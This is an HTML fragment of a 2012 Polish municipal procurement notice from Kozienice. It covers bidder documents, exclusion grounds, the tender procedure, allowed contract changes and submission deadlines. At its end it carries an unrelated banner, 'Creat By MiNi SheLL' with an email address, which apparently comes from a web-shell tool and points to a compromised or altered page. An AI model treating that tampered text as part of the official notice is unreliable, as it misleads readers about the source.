<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>a)	stosowne Pełnomocnictwo do reprezentacji - jeżeli osoby podpisujące ofertę działają na podstawie pełnomocnictwa - musi zostać ono złożone jako część oferty w oryginale lub kopii poświadczonej za zgodność z oryginałem przez notariusza,
b)	dokument ustanawiający Pełnomocnika do reprezentowania ich w postępowaniu o udzielenie
zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie niniejszego zamówienia publicznego - w przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia,
c)	pisemne zobowiązanie innych podmiotów do oddania do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia ( np. wg wzoru - załącznik nr 7 lub inny równoważny dokument- patrz uwaga do punktu 8.1.2.1), jeżeli wykonawca przy wykazywaniu spełniania warunków udziału w postępowaniu, o których mowa w pkt 8.1.1.1 i lub 8.1.1.2 powołuje się na potencjał innych podmiotów.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje możliwość dokonania następujących zmian postanowień zawartej umowy w stosunku do treści oferty:
       	a/ terminu wykonania zadania w następujących przypadkach:
	-   niesprzyjających warunków pogodowych,
	-   niedopełnieniu przez Zamawiającego jego obowiązków wynikających z umowy,
                -   z powodu uzasadnionych zmian  w zakresie sposobu wykonania przedmiotu zamówienia proponowanych  
                  przez Zamawiającego lub Wykonawcę, jeżeli te zmiany są korzystne dla Zamawiającego, 
               -  z powodu wystąpienia dodatkowych, a niemożliwych do przewidzenia przed zawarciem umowy przez 
                  doświadczonego wykonawcę, robót,
               -  z powodu okoliczności siły wyższej, np. wystąpienia zdarzenia losowego wywołanego przez czynniki 
                  zewnętrzne, którego nie można było przewidzieć z pewnością, w szczególności zagrażającego   
                  bezpośrednio życiu lub zdrowiu ludzi lub grożącego powstaniem szkody w znacznych rozmiarach,
                                 -  z powodu stanu wyższej konieczności, powodującego podjęcie działań w celu uchylenia bezpośredniego
                                niebezpieczeństwa grożącego dobru społecznemu lub jakiemukolwiek dobru jednostki,
               -  z powodu działań osób trzecich uniemożliwiających wykonanie prac, które to działania nie są 
                  konsekwencją winy którejkolwiek ze stron,
	 -  zawieszenia wykonania prac nie spowodowanych uchybieniami Wykonawcy,
/wówczas strony ustalą nowe terminy realizacji, z tym ze minimalny okres przesunięcia terminu zakończenia równy będzie okresowi przerwy lub postoju. O wystąpieniu okoliczności mogących wpłynąć na zmianę terminów Wykonawca winien jest poinformować Zamawiającego pisemnie i natychmiast odnotować to w dzienniku budowy/.
b/ w przypadku zaistnienia potrzeby zmiany rozwiązań technicznych, gdy proponowane rozwiązanie jest równorzędne lub lepsze funkcjonalnie od zaproponowanego w projekcie,
c/ gdy wystąpiły takie okoliczności, których nie można było przewidzieć w chwili zawarcia umowy i na które strony nie miały wpływu,
d/ w przypadku zaistnienia uzasadnionej potrzeby zmiany kierownika budowy lub podwykonawcy. 
Jeżeli Wykonawca w celu potwierdzenia spełnienia warunków udziału w postępowaniu posługiwał się zasobami dotychczasowego podwykonawcy lub kierownika budowy, zmiana podwykonawcy możliwa jest po przedłożeniu przez Wykonawcę dokumentów potwierdzających spełnienie warunków udziału w postępowaniu przez zaproponowanego podwykonawcę lub kierownika budowy,
e/ gdy nastąpi zmiana stawki podatku VAT przez władzę ustawodawczą w trakcie trwania umowy, wynikającej ze zmiany ustawy o podatku od towarów i usług oraz podatku akcyzowego.
f/ gdy nastąpi zmiana przepisów prawnych mających wpływ na realizację umowy, w szczególności na jej zakres, termin,
g/gdy nastąpi zmiana formy organizacyjno - prawnej lub siedziby Wykonawcy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.kozienice.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski w Kozienicach, ul. Parkowa 5, 26-900 Kozienice.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 28.06.2012 godzina 11:45, miejsce: Urząd Miejski w Kozienicach, ul. Parkowa 5, 26-900 Kozienice, pok. 111-Sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com